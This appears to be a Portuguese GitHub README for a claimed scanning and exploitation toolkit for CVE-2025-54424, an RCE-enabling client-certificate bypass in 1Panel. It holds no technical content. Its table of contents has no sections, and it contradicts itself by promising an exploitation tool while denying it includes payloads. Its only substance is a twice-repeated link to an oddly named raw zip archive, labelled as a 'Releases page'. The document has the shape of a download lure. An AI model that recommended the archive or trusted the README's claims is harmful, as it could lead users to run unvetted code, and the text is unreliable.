
CVE-2025-54424: bypass de certificado de cliente TLS no 1Panel permite RCE via CN forjado 'panel_client' usando uma ferramenta de varredura e exploração incluída. Afetado: <= v2.0.5. 🔐
https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip
O CVE-2025-54424 é uma vulnerabilidade no 1Panel que envolve desvio de certificado do cliente, podendo levar à execução remota de código. Este repositório fornece um conjunto integrado de ferramentas projetado para ajudar pesquisadores a realizar varreduras e testes de verificação desta vulnerabilidade em ambientes controlados de laboratório. A ferramenta enfatiza testes de segurança, uso educacional e pesquisa em conformidade com sistemas afetados. Este projeto não fornece cargas ofensivas ou scripts de exploração para acesso não autorizado ou ativos em redes externas. Utilize apenas em ambientes com autorização explícita e respeite as leis locais e requisitos de conformidade do setor.
Índice
Sobre este repositório Esta é uma coleção de ferramentas voltada para pesquisadores e engenheiros de segurança, projetada em torno do trabalho de pesquisa sobre o CVE-2025-54424. O objetivo central é fornecer um ambiente de teste transparente e reproduzível para avaliar o escopo de impacto, identificar fatores de configuração e avaliar a eficácia de correções em ambientes controlados. O projeto enfatiza processos de teste documentados, rastreamento de resultados e operações de proteção de ativos.
Objetivos e escopo do projeto
Código de conduta e ética
Visão geral das funcionalidades
Como funciona (arquitetura de alto nível)
Pontos de segurança e proteção
Requisitos de ambiente e instalação
Etapas de instalação (alto nível)
Início rápido (fluxo de alto nível)
Modos de uso e fluxos de trabalho
Guia do desenvolvedor
Testes e garantia de qualidade
Versões e lançamentos
Detalhes sobre versões e lançamentos
Guia de contribuição
Perguntas frequentes
Licença e autorização
Agradecimentos
Se você precisar ver itens de lançamento específicos, arquivos baixados e mais exemplos de configuração, visite o link abaixo e consulte a documentação relevante quando necessário. Veja a página de Releases em https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip
Observação